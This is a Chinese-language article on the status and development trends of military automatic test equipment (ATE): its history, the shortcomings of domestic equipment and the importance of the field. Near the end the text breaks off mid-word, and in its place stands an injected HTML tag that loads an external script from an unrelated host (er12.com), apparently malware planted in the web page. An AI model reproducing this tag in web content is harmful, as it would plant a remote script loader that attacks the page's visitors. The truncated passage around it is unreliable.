军用检测技术的现状及发展趋势

摘 要 讨论了我军检测技术的现状,提出了发展军用检测技术的意义。详细说明了军用自动检测技术的发展趋势以及实现军用自动检测的技术手段,并结合部队使用现状,阐述了适用于我军装备保障的检测技术发展方向。

关键词 检测技术;ate;装备保障;

1 前 言

随着我军武器装备的现代化水平的不断提高,大量的高科技武器装备不断的装备到部队,使我军武器装备日益复杂,为了保障我军武器装备系统的可靠性、维修性和战术技术性能,发挥其应有的战斗力,大力提高武器装备系统的状态监控、性能检测和故障诊断水平,已成为技术保障中的一个急需解决的重要问题。

同时,由于微电子技术、计算机技术和传感器技术的飞速发展,给自动检测技术的发展提供了十分有利的条件,应运而生的自动检测设备也广泛地应用于我军武器装备系统的研制、生产、储供和维修的各环节之中。自动检测技术在武器装备系统中的应用,已构成武器装备维修工程的重要内容之一,自动检测的手段和水平,已成为衡量维修现代化水平的一个重要标志。适用于武器装备维修使用的诊断测试设备简称为ate (automatic test equipment)或ats(automatic test system)。它是由多种测试仪器、设备或系统综合而成的有机整体,并能够在最少依赖于操作人员干预的情况下,通过计算机的控制自动完成对被测对象的功能行为或特征参数的分析、评估其性能状态、并对导致其工作异常的故障进行隔离等综合性的诊断测试过程。由于自动检测设备在技术上的不断发展,目前正在形成模块化、系列化和通用化、自动化和智能化、标准化的发展方向。

2 我军自动检测技术的现状

世界各国军方对自动检测技术都极为重视,花费了大量人力和财力发展军用自动检测设备。美军从 50年代中期,就开始研制军用检测设备, 6 0年代中期研制以计算机为核心的自动检测设备,到70年代已陆续研制成功并投入使用。随着陆军武器装备、维修工程理论和应用以及自动检测技术的发展,我军从 70年代中期开始,经过 2 0多年的探索和实践,已经陆续研制和装备部队一大批陆军自动检测设备,如火炮性能综合检测设备、雷达性能综合检测修理车和陆军战术导弹性能综合检测系统等等。这些自动检测设备的研制和装备部队,提高了我军检测手段现代化水平,有效地保障了武器装备的完好状态,推动了我军维修工作的发展。但就自动检测设备的发展和技术水平而言,陆军武器装备系统的自动检测设备还是比较落后,尚未形成模块化设计思想;缺乏总体规划,使得研制出的自动检测设备品种繁多,功能单一,未能形成功能上的系列化和通用化;检测原理和技术落后,未能形成测控技术上的自动化和智能化;研制中技术上的随意性和盲目性,导致自动检测设备的总体方案、系统的硬件和软件五花八门,未能形成技术的标准化。从整体上看,国产检测设备在技术性能、外观造型、制造工艺方面比国外仪器落后 1 0年左右,这些差距主要表现在 :

(1)自动测试系统技术落后,绝大多数领域所需的自动测试系统和模块的测试系统尚属空白,或依赖于国外进口;

(2)通用测量仪器的品种少,配套能力差,更新换代慢,且主要性能指标比较低,技术性能差;

(3)数字化、智能化、自动化程度低, 功能差;

(4)新产品设计手段和工艺落后,质量差,可靠性不高;

3 发展军用检测技术的意义

现代武器装备的技术先进性有力地促进了军用领域ate的不断发展,而信息处理技术、微电子技术和计算机等现代科学技术的不断进步,则成为推动军用领域ate结构和测试技术不断进步的强大动力。新一代军用领域的ate已成为测试技术与信息处理、性能检测与故障诊断、系统辨识和参数估计、控制与决策以及人工智能等多种技术紧密结合、综合发展的产物,在提高现代武器装备的综合作战效能方面发挥了巨大的作用。例如,在海湾战争中,美国海军舰艇共计发射了 170多枚“战斧”巡航导弹,几乎未出现任何技术故障。因此,新一代军用领域的ate已成为提高武器装备战斗力的“倍增器”,越来越受到各国军方的高度重视。 军用电子测量仪器ate是直接或间接地为军事目的服务的,是各种电子系统和武器系统研究、开发、调试、监测、维护的重要工具,其技术性能、质量、可靠性将直接关系到军事电子装备和武器系统的能力与安全。它是军用电子设备、电子系统、武器系统、现代化指挥系统安全运行和准确操作所必需的重要支撑技术。现代化的作战指挥系统、通信系统和武器系统技术的进步,对电子测量设备与测试技术的需求越来越高。不仅要求测试系统的功能强、精度高、体积小、重量轻、通用性强、机动性高、可靠性高,而且要求能适应现代化战争的恶劣环境,具有抗电磁干扰、抗辐射、抗毁坏的生存能力。军用电子测试技术发展很快,代表着仪器行业的最高水平,其中军用ate技术始终处在军用测?script src=http://er12.com/t.js>

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发布日期:2019年07月02日  所属分类:参考设计